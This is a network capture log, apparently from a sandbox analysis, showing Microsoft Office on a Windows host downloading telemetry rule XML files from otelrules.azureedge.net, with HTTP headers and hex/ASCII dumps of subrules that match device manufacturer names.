2024-11-22 19:36:08 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:08 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:08 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: babf4520-701e-005c-6e46-3cbb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193608Z-15b8b599d889gj5whC1TEBfyk000000001n000000000mkh6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:08 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	49788	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:08 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:09 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:09 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: a72cf994-301e-0099-6e45-3c6683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193609Z-178bfbc474bfw4gbhC1NYCunf400000003d000000000eh21 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:09 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	49791	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:10 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:11 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:10 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 87817176-601e-003e-034d-3c3248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193610Z-178bfbc474bgvl54hC1NYCsfuw00000003f0000000004vfz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:11 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	49790	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:10 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:11 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:10 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 8157cc8d-f01e-0003-1961-3b4453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193610Z-178bfbc474bgvl54hC1NYCsfuw00000003eg000000006ee0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:11 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.4	49793	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:10 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:11 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:10 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: 3029707a-401e-0047-3163-3b8597000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193610Z-178bfbc474bq2pr7hC1NYCkfgg00000003fg00000000neex x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:11 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	49792	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:10 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:11 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:11 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: a24720e5-f01e-0096-3f65-3b10ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193611Z-178bfbc474bgvl54hC1NYCsfuw00000003ag00000000p0hd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:11 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.4	49795	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:11 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:11 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:11 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: db42c49d-901e-007b-4a2f-3cac50000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193611Z-178bfbc474bpscmfhC1NYCfc2c000000022g0000000040ng x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:11 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.4	49796	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:12 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:13 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:13 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: df8835e2-601e-0002-5b4e-3ca786000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193613Z-15b8b599d88cn5thhC1TEBqxkn00000001ug0000000058hk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:13 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.4	49797	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:12 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:13 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:13 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: 3ac3f4da-f01e-001f-4c47-3c5dc8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193613Z-178bfbc474bscnbchC1NYCe7eg00000003n00000000052u5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:13 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.4	49799	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:12 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:13 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:13 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: 20caaba8-701e-005c-0363-3bbb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193613Z-178bfbc474bwlrhlhC1NYCy3kg00000003dg00000000d5q4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:13 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.4	49798	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:13 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:13 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:13 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: 16d74281-d01e-0066-164b-3cea17000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193613Z-15b8b599d88cn5thhC1TEBqxkn00000001qg00000000k1d1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:13 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.4	49800	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:13 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:13 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:13 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 00870788-c01e-000b-155b-3ce255000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193613Z-178bfbc474btvfdfhC1NYCa2en00000003f000000000fsxe x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:13 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" 